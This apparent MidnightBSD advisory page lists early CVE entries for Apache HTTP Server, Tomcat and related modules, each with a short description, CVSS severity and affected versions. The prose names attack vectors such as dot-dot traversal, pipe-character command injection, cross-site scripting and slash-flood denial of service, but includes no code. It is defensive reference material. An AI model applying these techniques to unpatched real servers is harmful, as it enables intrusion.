MidnightBSD

Advisories for apache

CVE-1999-0045 HIGH

List of arbitrary files on Web host via nph-test-cgi script.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
netscape communications_server 1.12
apache http_server 1.0
apache http_server 1.0.2
netscape enterprise_server 2.0a
apache http_server 1.0.5
netscape commerce_server 1.12
apache http_server 0.8.14
apache http_server 1.0.3
netscape communications_server 1.1
apache http_server 0.8.11
apache http_server 1.1
CVE-1999-0067 HIGH

phf CGI program allows remote command execution through shell metacharacters.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache http_server 1.0.3
ncsa ncsa_httpd 1.5a
CVE-1999-0070 MEDIUM

test-cgi program allows an attacker to list files on the server.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
CVE-1999-0071 HIGH

Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.1.1
CVE-1999-0107 MEDIUM

Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.0
apache http_server 1.0.2
apache http_server 1.0.5
apache http_server 1.1.1
apache http_server 0.8.14
apache http_server 1.0.3
apache http_server 1.2.5
apache http_server 0.8.11
apache http_server 1.1
CVE-1999-0236 MEDIUM

ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
apache http_server -
illinois ncsa_httpd -
CVE-1999-0289 MEDIUM

The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server -
CVE-1999-0678 MEDIUM

A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server -
CVE-1999-0926 HIGH

Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.2.5
CVE-1999-1053 HIGH

guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.9
matt_wright matt_wright_guestbook 2.3
CVE-1999-1199 HIGH

Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
CVE-1999-1237 HIGH

Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-120,

Products Affected

Vendor Product Version
apache http_server -
CVE-1999-1293 HIGH

mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
CVE-1999-1412 MEDIUM

A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server -
apple macos 1.0
CVE-2000-0505 MEDIUM

The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
ibm http_server 1.3.3
apache http_server 1.3.11
apache http_server 1.3.12
apache http_server 1.3.9
apache http_server 1.3.6
ibm http_server 1.3.6.2
CVE-2000-0672 MEDIUM

The default configuration of Jakarta Tomcat does not restrict access to the /admin context, which allows remote attackers to read arbitrary files by directly calling the administrative servlets to add a context for the root directory.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache tomcat 3.1
apache tomcat 3.0
CVE-2000-0759 MEDIUM

Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.1
CVE-2000-0760 MEDIUM

The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.1
apache tomcat 3.0
CVE-2000-0868 MEDIUM

The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.12
suse suse_linux 6.3
suse suse_linux 6.4
CVE-2000-0869 MEDIUM

The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary directories via the PROPFIND HTTP request method.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.12
suse suse_linux 6.3
suse suse_linux 7.0
suse suse_linux 6.2
suse suse_linux 6.1
suse suse_linux 6.0
suse suse_linux 6.4
CVE-2000-0913 MEDIUM

mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.0
apache http_server 1.3.11
apache http_server 1.3.12
apache http_server 1.0.2
apache http_server 1.0.5
apache http_server 1.1.1
apache http_server 0.8.14
apache http_server 1.0.3
apache http_server 0.8.11
apache http_server 1.1
CVE-2000-1204 MEDIUM

Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.11
apache http_server 1.3.12
apache http_server 1.3.9
CVE-2000-1205 MEDIUM

Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server 1.3.5
apache http_server 1.3.11
apache http_server 1.3.9
apache http_server 1.3.1
apache http_server 1.3.4
apache http_server 1.3.6
apache http_server 1.3.8
apache http_server 1.3.7
apache http_server 1.3.10
apache http_server 1.3.2
apache http_server 1.3.0
apache http_server 1.3.3
CVE-2000-1206 MEDIUM

Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.10
apache http_server 1.3.9
CVE-2000-1210 MEDIUM

Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2000-1247 LOW

The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.

CVSS 2.0

Severity: LOW

Problem Type: CWE-16,

Products Affected

Vendor Product Version
apache jserv 1.1.2
CVE-2001-0042 MEDIUM

PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3
CVE-2001-0131 LOW

htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.

CVSS 2.0

Severity: LOW

Problem Type: CWE-59,

Products Affected

Vendor Product Version
apache http_server 2.0
apache http_server 1.3.14
debian debian_linux 2.2
CVE-2001-0590 MEDIUM

Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2001-0729 MEDIUM

Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.20
CVE-2001-0730 MEDIUM

split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.20
CVE-2001-0731 MEDIUM

Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.20
CVE-2001-0766 HIGH

Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-178,

Products Affected

Vendor Product Version
apache http_server 1.3.14
CVE-2001-0829 MEDIUM

A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.2.1
CVE-2001-0917 MEDIUM

Jakarta Tomcat 4.0.1 allows remote attackers to reveal physical path information by requesting a long URL with a .JSP extension.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.0.1
CVE-2001-0925 MEDIUM

The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache http_server 1.3.11
apache http_server 1.3.12
apache http_server 1.3.14
apache http_server 1.3.17
debian debian_linux 2.2
CVE-2001-1072 MEDIUM

Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.3.14
apache http_server 1.3.17
CVE-2001-1342 MEDIUM

Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.3.12
apache http_server 1.3.14
apache http_server 1.3.17
apache http_server 1.3.18
apache http_server 1.3.15
apache http_server 1.3.16
CVE-2001-1449 HIGH

The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.11
apache http_server 1.3.9
apache http_server 1.3.1
mandrakesoft mandrake_linux 8.0
apache http_server 1.3.17
mandrakesoft mandrake_single_network_firewall 7.2
apache http_server 1.3.4
mandrakesoft mandrake_linux 7.3
apache http_server 1.3.6
apache http_server 1.3
apache http_server 1.3.12
apache http_server 1.3.14
apache http_server 1.3.18
mandrakesoft mandrake_linux_corporate_server 1.0.1
mandrakesoft mandrake_linux 7.1
apache http_server 1.3.3
CVE-2001-1534 LOW

mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.

CVSS 2.0

Severity: LOW

Problem Type: CWE-384,

Products Affected

Vendor Product Version
apache http_server *
CVE-2001-1556 MEDIUM

The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-532,

Products Affected

Vendor Product Version
apache http_server *
CVE-2001-1563 HIGH

Unknown vulnerability in Tomcat 3.2.1 running on HP Secure OS for Linux 1.0 allows attackers to access servlet resources. NOTE: due to the vagueness of the vendor advisory, it is not clear whether this issue is already covered by other CVE identifiers.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
hp secure_os 1.0
apache tomcat 3.2.1
CVE-2002-0061 HIGH

Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,

Products Affected

Vendor Product Version
apache http_server *
CVE-2002-0185 HIGH

mod_python version 2.7.6 and earlier allows a module indirectly imported by a published module to then be accessed via the publisher, which allows remote attackers to call possibly dangerous functions from the imported module.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache mod_python *
CVE-2002-0240 MEDIUM

PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.28
CVE-2002-0249 MEDIUM

PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.28
CVE-2002-0257 HIGH

Cross-site scripting vulnerability in auction.pl of MakeBid Auction Deluxe 3.30 allows remote attackers to obtain information from other users via the form fields (1) TITLE, (2) DESCTIT, (3) DESC, (4) searchstring, (5) ALIAS, (6) EMAIL, (7) ADDRESS1, (8) ADDRESS2, (9) ADDRESS3, (10) PHONE1, (11) PHONE2, (12) PHONE3, or (13) PHONE4.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.3.22
apache http_server 1.3.20
usanet_creations makebid_auction_deluxe 3.30
apache http_server 1.3.17
apache http_server 1.3.18
CVE-2002-0392 HIGH

Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
debian debian_linux 2.2
CVE-2002-0493 HIGH

Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-254,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2002-0654 MEDIUM

Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.34
apache http_server 2.0.35
apache http_server 2.0.28
apache http_server 2.0.37
apache http_server 2.0.36
CVE-2002-0661 HIGH

Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.39
apache http_server 2.0.34
apache http_server 2.0.35
apache http_server 2.0.28
apache http_server 2.0.37
apache http_server 2.0.36
CVE-2002-0682 HIGH

Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.0.3
CVE-2002-0839 HIGH

The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
debian debian_linux 3.0
debian debian_linux 2.2
CVE-2002-0840 MEDIUM

Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle oracle8i 8.1.7.1
apache http_server 1.3.19
apache http_server 2.0.39
oracle oracle9i 9.0
apache http_server 1.3.4
oracle oracle9i 9.0.1.3
apache http_server 2.0.36
apache http_server 2.0
apache http_server 1.3.22
apache http_server 1.3.14
oracle application_server 1.0.2.2
oracle oracle9i 9.0.1
oracle oracle9i 9.0.1.2
apache http_server 2.0.41
oracle database_server 9.2.2
oracle database_server 8.1.7
oracle application_server 1.0.2
apache http_server 2.0.42
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.25
apache http_server 2.0.32
apache http_server 2.0.38
oracle application_server 1.0.2.1s
apache http_server 1.3.9
apache http_server 1.3.1
oracle oracle9i 9.0.2
apache http_server 2.0.40
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 1.3.6
apache http_server 1.3
apache http_server 2.0.35
oracle oracle8i 8.1.7_.0.0_enterprise
oracle oracle8i 8.1.7_.1.0_enterprise
apache http_server 1.3.12
oracle application_server 9.0.2.1
oracle database_server 9.2.1
apache http_server 1.3.20
oracle application_server 9.0.2
apache http_server 1.3.18
oracle oracle8i 8.1.7
apache http_server 2.0.28
apache http_server 2.0.37
apache http_server 1.3.3
CVE-2002-0843 HIGH

Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle oracle8i 8.1.7.1
apache http_server 1.3.19
oracle oracle8i 8.1.7.0.0_enterprise
apache http_server 1.3.4
apache http_server 1.3.22
apache http_server 1.3.14
oracle application_server 1.0.2.2
oracle database_server 9.2.2
oracle database_server 8.1.7
oracle application_server 1.0.2
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.25
oracle application_server 1.0.2.1s
apache http_server 1.3.9
apache http_server 1.3.1
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 1.3.6
apache http_server 1.3
oracle oracle8i 8.1.7.1.0_enterprise
apache http_server 1.3.12
oracle application_server 9.0.2.1
apache http_server 1.3.20
oracle application_server 9.0.2
apache http_server 1.3.18
oracle oracle8i 8.1.7
apache http_server 1.3.3
CVE-2002-0935 MEDIUM

Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.0.3
CVE-2002-0936 MEDIUM

The Java Server Pages (JSP) engine in Tomcat allows web page owners to cause a denial of service (engine crash) on the web server via a JSP page that calls WPrinterJob().pageSetup(null,null).

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.0.3
CVE-2002-1148 MEDIUM

The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 4.0.0
apache tomcat 3.1.1
apache tomcat 3.2.1
apache tomcat 4.1.10
apache tomcat 3.0
apache tomcat 4.0.1
apache tomcat 3.2
apache tomcat 4.0.4
apache tomcat 4.1.9
apache tomcat 3.2.2
apache tomcat 3.2.3
apache tomcat 4.1.0
apache tomcat 3.1
apache tomcat 3.3
apache tomcat 3.2.4
apache tomcat 4.0.3
apache tomcat 4.0.2
apache tomcat 4.1.3
CVE-2002-1156 MEDIUM

Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0.42
CVE-2002-1233 LOW

A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.22
apache http_server 1.3.25
apache http_server 1.3.20
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 1.3.18
apache http_server 1.3.27
CVE-2002-1394 HIGH

Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.1.0
apache tomcat 4.0.0
apache tomcat 4.0.5
apache tomcat 4.1.10
apache tomcat 4.0.1
apache tomcat 4.0.3
apache tomcat 4.0.2
apache tomcat 4.0.4
apache tomcat 4.1.3
apache tomcat 4.1.9
CVE-2002-1567 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.1.0
CVE-2002-1592 MEDIUM

The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0
apache http_server 2.0.32
apache http_server 2.0.35
apache http_server 2.0.28
CVE-2002-1593 MEDIUM

mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.0
apache http_server 2.0.32
apache http_server 2.0.38
apache http_server 2.0.41
apache http_server 2.0.39
apache http_server 2.0.40
apache http_server 2.0.35
apache http_server 2.0.28
apache http_server 2.0.37
apache http_server 2.0.36
CVE-2002-1658 MEDIUM

Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 1.3.19
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.25
apache http_server 1.3.9
apache http_server 1.3.1
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 1.3.4
apache http_server 1.3.6
apache http_server 1.3.12
apache http_server 1.3.22
apache http_server 1.3.14
apache http_server 1.3.20
apache http_server 1.3.18
apache http_server 1.3.27
apache http_server 1.3.3
CVE-2002-1850 MEDIUM

mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-667,

Products Affected

Vendor Product Version
apache http_server 2.0.39
apache http_server 2.0.40
CVE-2002-1895 MEDIUM

The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.3
apache tomcat 4.0.4
CVE-2002-2006 MEDIUM

The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 4.0.0
apache tomcat 3.1.1
apache tomcat 3.2.1
apache tomcat 3.0
apache tomcat 4.0.1
apache tomcat 3.2
apache tomcat 3.2.3
apache tomcat 4.1.0
apache tomcat 3.1
apache tomcat 3.3
apache tomcat 3.2.4
apache tomcat 4.0.3
apache tomcat 4.0.2
CVE-2002-2007 MEDIUM

The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 3.2.4
apache tomcat 3.2.3
CVE-2002-2008 MEDIUM

Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.0.3
CVE-2002-2009 MEDIUM

Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.0.1
CVE-2002-2012 MEDIUM

